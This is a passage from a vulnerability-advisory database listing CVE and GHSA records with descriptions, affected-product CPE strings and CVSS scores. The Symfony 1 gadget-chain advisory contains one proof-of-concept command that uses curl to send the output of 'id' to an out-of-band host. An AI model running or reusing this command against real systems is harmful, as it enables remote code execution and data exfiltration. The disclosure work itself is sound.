"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update15:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update16:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update17:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update18:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update3:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update4:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update5:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update6:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update7:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update8:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.4:sp1_update9:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp1_update1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp1_update2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp2_update1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp2_update2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp2_update3:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp2_update4:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:7.5:sp2_update5:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:13:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:13:sp1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:13:sp2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:14.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15:*:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:update_1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:update_2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:update_3:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:update_4:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:update_5:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:15.1:update_6:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:16:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:16:update1:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:16:update2:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:16:update3:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:16:update4:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:17:-:*:*:*:*:*:*",
"cpe:2.3:a:siemens:simatic_wincc:17:update1:*:*:*:*:*:*"
] | null | 8.8 | null | 4 | null |
|
GHSA-wjv8-pxr6-5f4r
|
Gadget chain in Symfony 1 due to vulnerable Swift Mailer dependency
|
SummarySymfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project.DetailsThis vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example:We will make the assumption this is the case in the rest of this explanation.Symfony 1 depends on Swift Mailer which is bundled by default in `vendor` directory in the default installation since 1.3.0. Swift Mailer classes implement some `__destruct()` methods like for instance `Swift_KeyCache_DiskKeyCache` :This method is called when php destroy the object in memory. However, it is possible to include any object type in `$this->_keys` to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on `foreach($this->_keys ...)` for any class implementing `ArrayAccess` interface. `sfOutputEscaperArrayDecorator` implements such interface. Here is the call made on `offsetGet()`:Which trigger `escape()` in `sfOutputEscaper` class with attacker controlled parameters from deserialized object with `$this->escapingMethod` and `$this->value[$offset]`:Which calls `call_user_func` with previous attacker controlled input.However, most recent versions of Swift Mailer are not vulnerable anymore. A fix has been done with [commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed](https://github.com/swiftmailer/swiftmailer/commit/5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed) to prevent #arbitrary deserialization. This commit has been shipped with version 6.2.5 of Swift Mailer.Concreetly, `__wakeup()` have been implemented to clear attributes' values:And/or prevent any deserialization:If you install last version 1.5 with composer, you will end-up installing last 6.x version of Swift Mailer containing the previous fixes. Here is an extract of the composer.lock:By reviewing releases archives, `composer.json` targets vulnerable branch 5.x before Symfony 1.5.13 included:So, the gadget chain is valid for at least versions until 1.5.13.However, if you install last version of Symfony with git as described in the README, Swift Mailer vendors is referenced through a git sub-module targeting branch 5.x of Swift Mailer:And branch 5.x does not have the backport of the fix committed on branch 6.x. Last commit date from Jul 31, 2018.PoCSo we need the following object to trigger an OS command like `shell_exec("curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)");`:We craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before:gadgets.php:chain.php:And trigger the deserialization with an HTTP request like the following on a dummy test controller:Note that CVSS score is not applicable to this kind of vulnerability.ImpactThe attacker can execute any PHP command which leads to remote code execution.RecommendationAs with composer, Symfony is already using branch 6.x of Swift mailer there does not seem to be breaking change for Symfony 1 with branch 6.x? Or is it a mistake?In this case, update submodule reference to version 6.2.5 or higher, after commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fedOr if Symfony 1.5 need Swift 5.x, fork Swift mailer in a FOS/SwiftMailer repository and cherry-pick commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed
|
[] | null | 5 | null | null | null |
CVE-2019-11290
|
Cloud Foundry UAA logs query parameters in tomcat access file
|
Cloud Foundry UAA Release, versions prior to v74.8.0, logs all query parameters to tomcat’s access file. If the query parameters are used to provide authentication, ie. credentials, then they will be logged as well.
|
[
"cpe:2.3:a:cloudfoundry:cf-deployment:*:*:*:*:*:*:*:*",
"cpe:2.3:a:cloudfoundry:user_account_and_authentication:*:*:*:*:*:*:*:*"
] | null | null | 8.8 | null | null |
CVE-2019-15995
|
Cisco DNA Spaces: Connector SQL Injection Vulnerability
|
A vulnerability in the web UI of Cisco DNA Spaces: Connector could allow an authenticated, remote attacker to execute arbitrary SQL queries. The vulnerability exists because the web UI does not properly validate user-supplied input. An attacker could exploit this vulnerability by entering malicious SQL statements in an affected field in the web UI. A successful exploit could allow the attacker to remove the SQL database, which would require the reinstallation of the Connector VM.
|
[
"cpe:2.3:a:cisco:dna_spaces\\:_connector:*:*:*:*:*:*:*:*"
] | null | null | 6.5 | null | null |
CVE-2016-1000135
|
Reflected XSS in wordpress plugin hdw-tube v1.2
|
[
"cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*"
] | null | null | 6.1 | 4.3 | null |
|
CVE-2023-50176
|
A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 through 7.2.7 and 7.0.0 through 7.0.13 allows attacker to execute unauthorized code or commands via phishing SAML authentication link.
|
[
"cpe:2.3:o:fortinet:fortios:7.4.3:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.4.2:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.4.1:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.4.0:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.7:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.6:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.5:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.4:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.3:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.2:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.1:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.2.0:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.13:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.12:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.11:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.10:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.9:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.8:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.7:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.6:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.5:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.4:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.3:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.2:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.1:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:7.0.0:*:*:*:*:*:*:*",
"cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*"
] | null | 7.1 | null | null | null |
|
GHSA-jr2m-hrp3-3wj4
|
In Memcached before 1.6.22, an off-by-one error exists when processing proxy requests in proxy mode, if \n is used instead of \r\n.
|
[] | null | 9.8 | null | null | null |
|
CVE-2022-23578
|
Memory leak in Tensorflow
|
Tensorflow is an Open Source Machine Learning Framework. If a graph node is invalid, TensorFlow can leak memory in the implementation of `ImmutableExecutorState::Initialize`. Here, we set `item->kernel` to `nullptr` but it is a simple `OpKernel*` pointer so the memory that was previously allocated to it would leak. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
|
[
"cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"cpe:2.3:a:google:tensorflow:2.7.0:*:*:*:*:*:*:*"
] | null | 4.3 | null | null | null |
CVE-2016-2878
|
Multiple cross-site request forgery (CSRF) vulnerabilities in IBM QRadar SIEM 7.1 before MR2 Patch 13 and 7.2 before 7.2.7 allow remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences.
|
[
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.4:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.5:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.2.6:*:*:*:*:*:*:*"
] | null | null | 8 | 6 | null |
|
CVE-2014-1915
|
Multiple cross-site request forgery (CSRF) vulnerabilities in Command School Student Management System 1.06.01 allow remote attackers to hijack the authentication of (1) administrators for requests that change the administrator password via an update action to sw/admin_change_password.php or (2) unspecified victims for requests that add a topic or blog entry to sw/add_topic.php. NOTE: vector 2 can be leveraged to bypass the authentication requirements for exploiting vector 1 in CVE-2014-1914.
|
[
"cpe:2.3:a:doug_poulin:command_school_student_management_system:1.06.01:*:*:*:*:*:*:*"
] | null | null | null | 6.8 | null |
|
GHSA-r484-pm6m-49rr
|
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Bentley MicroStation CONNECT 10.16.0.80. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JT files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-15382.
|
[] | null | null | null | null | null |
|
GHSA-qj96-83mw-f2rw
|
This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted DMG file may lead to arbitrary code execution with system privileges.
|
[] | null | 7.8 | null | null | null |
|
GHSA-gw7j-rv4v-wrcj
|
Dell Alienware Command Center, versions prior to 6.2.7.0, contain an uncontrolled search path element vulnerability. A local malicious user could potentially inject malicious files in the file search path, leading to system compromise.
|
[] | null | 7.4 | null | null | null |
|
GHSA-wrc6-3hf5-f858
|
An issue was discovered in Samsung Mobile Processor Exynos 9820, 9825, 980, 990, 1080, 2100, 1280, 2200, and 1380. A Double Free in the mobile processor leads to privilege escalation.
|
[] | null | 8.8 | null | null | null |
|
RHSA-2020:2529
|
Red Hat Security Advisory: tomcat6 security update
|
tomcat: deserialization flaw in session persistence storage leading to RCE
|
[
"cpe:/o:redhat:enterprise_linux:6::client",
"cpe:/o:redhat:enterprise_linux:6::computenode",
"cpe:/o:redhat:enterprise_linux:6::server",
"cpe:/o:redhat:enterprise_linux:6::workstation"
] | null | 7 | null | null | null |
CVE-2018-15397
|
Cisco Adaptive Security Appliance IPsec VPN Denial of Service Vulnerability
|
A vulnerability in the implementation of Traffic Flow Confidentiality (TFC) over IPsec functionality in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to an error that may occur if the affected software renegotiates the encryption key for an IPsec tunnel when certain TFC traffic is in flight. An attacker could exploit this vulnerability by sending a malicious stream of TFC traffic through an established IPsec tunnel on an affected device. A successful exploit could allow the attacker to cause a daemon process on the affected device to crash, which could cause the device to crash and result in a DoS condition.
|
[
"cpe:2.3:a:cisco:secure_firewall_management_center:6.2.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:adaptive_security_appliance_software:9.6.4:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:adaptive_security_appliance_software:9.9.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:adaptive_security_appliance_software:9.9.1\\(1\\):*:*:*:*:*:*:*"
] | null | 6.8 | null | 7.1 | null |
CVE-2025-0348
|
CampCodes DepEd Equipment Inventory System add_employee.php cross site scripting
|
A vulnerability was found in CampCodes DepEd Equipment Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /data/add_employee.php. The manipulation of the argument data leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
|
[] | 5.3 | 3.5 | 3.5 | 4 | null |
CVE-2024-41948
|
biscuit-java vulnerable to public key confusion in third party block
|
biscuit-java is the java implementation of Biscuit, an authentication and authorization token for microservices architectures. Third-party blocks can be generated without transferring the whole token to the third-party authority. Instead, a ThirdPartyBlock request can be sent, providing only the necessary info to generate a third-party block and to sign it, which includes the public key of the previous block (used in the signature) and the public keys part of the token symbol table (for public key interning in datalog expressions). A third-part block request forged by a malicious user can trick the third-party authority into generating datalog trusting the wrong keypair. This vulnerability is fixed in 4.0.0.
|
[
"cpe:2.3:a:biscuitsec:biscuit-java:*:*:*:*:*:*:*:*"
] | null | 3 | null | null | null |
GHSA-rh4j-5rhw-hr54
|
vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator
|
DescriptionThe vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weights_only parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling.ImpactThis vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely.Note that most models now use the safetensors format, which is not vulnerable to this issue.Referenceshttps://pytorch.org/docs/stable/generated/torch.load.htmlFix: https://github.com/vllm-project/vllm/pull/12366
|
[] | null | 7.5 | null | null | null |
ICSA-17-201-01
|
Schneider Electric PowerSCADA Anywhere and Citect Anywhere
|
The secure gateway component of the affected products is vulnerable to CSRF for multiple state-changing requests. This type of attack requires some level of social engineering in order to get a legitimate user to click on or access a malicious link/site containing the CSRF attack.CVE-2017-7969 has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N). An attacker on an adjacent network may be able to specify arbitrary server target nodes in connection requests to the secure gateway and server components.CVE-2017-7970 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). The affected products use outdated cipher suites and improperly verify peer SSL certificates.CVE-2017-7971 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N). An attacker on an adjacent network may be able to escape out of remote applications and launch other processes.CVE-2017-7972 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).
|
[] | null | null | 5.5 | null | null |
GHSA-qjf6-f5hw-69vh
|
The get_attachment_link function in Template.pm in Bugzilla 2.x and 3.x before 3.6.10, 3.7.x and 4.0.x before 4.0.7, 4.1.x and 4.2.x before 4.2.2, and 4.3.x before 4.3.2 does not check whether an attachment is private before presenting the attachment description within a public comment, which allows remote attackers to obtain sensitive description information by reading a comment.
|
[] | null | null | null | null | null |
|
CVE-2014-3264
|
Cisco Adaptive Security Appliance (ASA) Software 9.1(.5) and earlier allows remote authenticated users to cause a denial of service (device reload) via crafted attributes in a RADIUS packet, aka Bug ID CSCun69561.
|
[
"cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*"
] | null | null | null | 6.3 | null |
|
CVE-2017-8295
|
WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for this message to bounce or be resent, leading to transmission of the reset key to a mailbox on an attacker-controlled SMTP server. This is related to problematic use of the SERVER_NAME variable in wp-includes/pluggable.php in conjunction with the PHP mail function. Exploitation is not achievable in all cases because it requires at least one of the following: (1) the attacker can prevent the victim from receiving any e-mail messages for an extended period of time (such as 5 days), (2) the victim's e-mail system sends an autoresponse containing the original message, or (3) the victim manually composes a reply containing the original message.
|
[
"cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"
] | null | null | 5.9 | 4.3 | null |
|
GHSA-rrx7-mfpg-89v6
|
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infomaniak Staff VOD Infomaniak allows Reflected XSS.This issue affects VOD Infomaniak: from n/a through 1.5.6.
|
[] | null | 7.1 | null | null | null |
|
GHSA-439g-8mpp-5qvg
|
The HybridAuth Social Login module 7.x-2.x before 7.x-2.13 for Drupal allows remote attackers to bypass the user registration by administrator only configuration and create an account via a social login.
|
[] | null | null | null | null | null |
|
CVE-2019-9323
|
In the Wallpaper Manager service, there is a possible information disclosure due to a missing permission check. Any application can access wallpaper image with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-30770233
|
[
"cpe:2.3:o:google:android:10.0:*:*:*:*:*:*:*"
] | null | 5.3 | null | 5 | null |
|
GHSA-4w35-q3v2-v3v5
|
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability."
|
[] | null | null | null | null | null |
|
GHSA-94q2-v3mg-h9cf
|
Stack-based buffer overflow in utp.cpp in libutp, as used in Transmission before 2.74 and possibly other products, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted "micro transport protocol packets."
|
[] | null | null | null | null | null |
|
GHSA-947m-jhcv-94rp
|
In version v0.3.8 of open-webui/open-webui, a vulnerability exists where a token is returned when a user with a pending role logs in. This allows the user to perform actions without admin confirmation, bypassing the intended approval process.
|
[] | null | null | 5.4 | null | null |
|
GHSA-c752-3p6c-46qc
|
Unauth. Stored Cross-Site Scripting (XSS) vulnerability in wpdevart Gallery – Image and Video Gallery with Thumbnails plugin <= 2.0.3 versions.
|
[] | null | 7.1 | null | null | null |
|
GHSA-v9hv-xmm8-5vcw
|
The Microsoft Office Input Method Editor (IME) for Simplified Chinese in Microsoft Pinyin IME 2010, Office Pinyin SimpleFast Style 2010, and Office Pinyin New Experience Style 2010 does not properly restrict access to configuration options, which allows local users to gain privileges via the Microsoft Pinyin (aka MSPY) IME toolbar, aka "Pinyin IME Elevation Vulnerability."
|
[] | null | null | null | null | null |
|
GHSA-ccqr-929f-qh45
|
The Linux trustees kernel patch allows attackers to cause a denial of service by accessing a file or directory with a long name.
|
[] | null | null | null | null | null |
|
CVE-2019-0319
|
The SAP Gateway, versions 7.5, 7.51, 7.52 and 7.53, allows an attacker to inject content which is displayed in the form of an error message. An attacker could thus mislead a user to believe this information is from the legitimate service when it's not.
|
[
"cpe:2.3:a:sap:gateway:7.5:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:gateway:7.51:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:gateway:7.52:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:gateway:7.53:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:ui5:1.0.0:*:*:*:*:*:*:*"
] | null | null | 7.5 | 5 | null |
|
GHSA-hqwx-gq78-vv2g
|
Multiple buffer overflows in the British Telecommunications Consumer webhelper ActiveX control before 2.0.0.8 in btwebcontrol.dll allow remote attackers to execute arbitrary code via unspecified vectors.
|
[] | null | null | null | null | null |
|
CVE-2001-1275
|
MySQL before 3.23.31 allows users with a MySQL account to use the SHOW GRANTS command to obtain the encrypted administrator password from the mysql.user table and possibly gain privileges via password cracking.
|
[
"cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*"
] | null | null | null | 7.2 | null |
|
CVE-2025-1991
|
IBM Informix Dynamic Server denial of service
|
IBM Informix Dynamic Server 12.10,14.10, and15.0 could allow a remote attacker to cause a denial of service due to an integer underflow when processing packets.
|
[
"cpe:2.3:a:ibm:informix_dynamic_server:12.10:-:*:*:-:*:*:*",
"cpe:2.3:a:ibm:informix_dynamic_server:14.10:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:informix_dynamic_server:15.0:*:*:*:*:*:*:*"
] | null | 7.5 | null | null | null |
CVE-2025-6973
|
Use After Free vulnerability exists in the JT file reading procedure in SOLIDWORKS eDrawings on Release SOLIDWORKS Desktop 2025
|
Use After Free vulnerability exists in the JT file reading procedure in SOLIDWORKS eDrawings on Release SOLIDWORKS Desktop 2025. This vulnerability could allow an attacker to execute arbitrary code while opening a specially crafted JT file.
|
[] | null | 7.8 | null | null | null |
CVE-2008-4437
|
Directory traversal vulnerability in importxml.pl in Bugzilla before 2.22.5, and 3.x before 3.0.5, when --attach_path is enabled, allows remote attackers to read arbitrary files via an XML file with a .. (dot dot) in the data element.
|
[
"cpe:2.3:a:mozilla:bugzilla:2.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.6:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.8:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.9:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.22.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.22.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.22.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.22.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.23:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.23.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.23.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.23.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:2.23.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:3.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:3.1.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:3.1.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:3.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:bugzilla:3.1.4:*:*:*:*:*:*:*"
] | null | null | null | 7.1 | null |
|
GHSA-97pr-hr9m-3q8q
|
Adobe Animate version 20.5 (and earlier) is affected by a stack overflow vulnerability, which could lead to arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.
|
[] | null | null | null | null | null |
|
GHSA-4ff6-gvwq-f4r6
|
The XML interface in Huawei OceanStor UDS devices with software before V100R002C01SPC102 allows remote authenticated users to obtain sensitive information via a crafted XML document.
|
[] | null | null | 5 | null | null |
|
CVE-2012-4441
|
Cross-site Scripting (XSS) in Jenkins main before 1.482 and LTS before 1.466.2 allows remote attackers to inject arbitrary web script or HTML in the CI game plugin.
|
[
"cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*",
"cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*"
] | null | 6.1 | null | 4.3 | null |
|
GHSA-6gmm-6q8h-c7mm
|
in OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.
|
[] | null | 4.7 | null | null | null |
|
GHSA-6fh4-f2fp-rjwp
|
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.50.0 through 8.50.14 and 8.51.0 through 8.51.04 allows remote authenticated users to affect confidentiality via unknown vectors related to Portal.
|
[] | null | null | null | null | null |
|
RHSA-2019:4062
|
Red Hat Security Advisory: python-jinja2 security update
|
python-jinja2: Sandbox escape due to information disclosure via str.format
|
[
"cpe:/o:redhat:rhel_aus:7.4::server",
"cpe:/o:redhat:rhel_e4s:7.4::server",
"cpe:/o:redhat:rhel_tus:7.4::server"
] | null | null | 9 | null | null |
GHSA-7gq4-cwqg-9hj4
|
An issue was discovered in Joomla! 2.5.0 through 3.10.6 & 4.0.0 through 4.1.0. Inadequate validation of URLs could result into an invalid check whether an redirect URL is internal or not.
|
[] | null | 6.1 | null | null | null |
|
GHSA-jr3m-4g36-rv56
|
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6100 before 1.0.0.57, R6100 before 1.0.1.20, R7800 before 1.0.2.40, WNDR3700v4 before 1.0.2.92, WNDR4300 before 1.0.2.94, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, and WNR2000v5 before 1.0.0.62.
|
[] | null | null | null | null | null |
|
CVE-2025-1332
|
FastCMS Template Menu menu cross site scripting
|
A vulnerability has been found in FastCMS up to 0.1.5 and classified as problematic. This vulnerability affects unknown code of the file /fastcms.html#/template/menu of the component Template Menu. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available.
|
[] | 4.8 | 2.4 | 2.4 | 3.3 | null |
CVE-2014-7959
|
SQL injection vulnerability in admin/htaccess/bpsunlock.php in the BulletProof Security plugin before .51.1 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the tableprefix parameter.
|
[
"cpe:2.3:a:ait-pro:bulletproof_security:.44:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.44.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.2:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.4:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.5:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.6:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.7:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.45.8:*:*:*:*:wordpress:*:*",
